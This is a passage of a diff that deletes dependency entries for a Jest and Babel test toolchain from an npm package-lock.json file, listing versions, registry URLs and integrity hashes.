"jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" - } - }, - "@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, - "requires": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" - } - }, - "@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, - "requires": { - "jest-get-type": "^29.4.3" - } - }, - "@jest/fake-timers": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - } - }, - "@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - } - }, - "@jest/schemas": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.27.8" - } - }, - "@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", - "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - } - }, - "@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - }, - "dependencies": { - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - } - } - }, - "@nicolo-ribaudo/semver-v6": { - "version": "6.3.3", - "resolved": "https://registry.npmjs.org/@nicolo-ribaudo/semver-v6/-/semver-v6-6.3.3.tgz", - "integrity": "sha512-3Yc1fUTs69MG/uZbJlLSI3JISMn2UV2rg+1D/vROUqZyh3l6iYHCs7GMp+M40ZD7yOdDbYjJcU1oTJhrc+dGKg==", - "dev": true - }, - "@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "requires": { - "@sinonjs/commons": "^3.0.0" - } - }, - "@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", - "dev": true, - "requires": { - "@babel/types": "^7.20.7" - } - }, - "@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.5.3", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/node": { - "version": "20.4.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.4.1.tgz", - "integrity": "sha512-JIzsAvJeA/5iY6Y/OxZbv1lUcc8dNSE77lb2gnBH+/PJ3lFR1Ccvgwl5JWnHAkNHcRsT0TbpVOsiMKZ1F/yyJg==", - "dev": true - }, - "@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "requires": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - } - }, - "babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - } - }, - "babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.2.tgz", - "integrity": "sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==", - "dev": true, - "requires": { - "fill-range": "^7.0.1" - } - }, - "browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001515", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001515.tgz", - "integrity": "sha512-eEFDwUOZbE24sb+Ecsx3+OvNETqjWIdabMy52oOkIgcUtAsQifjUG9q4U9dgTHJM2mfk4uEPxc0+xuFdJ629QA==", - "dev": true - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": 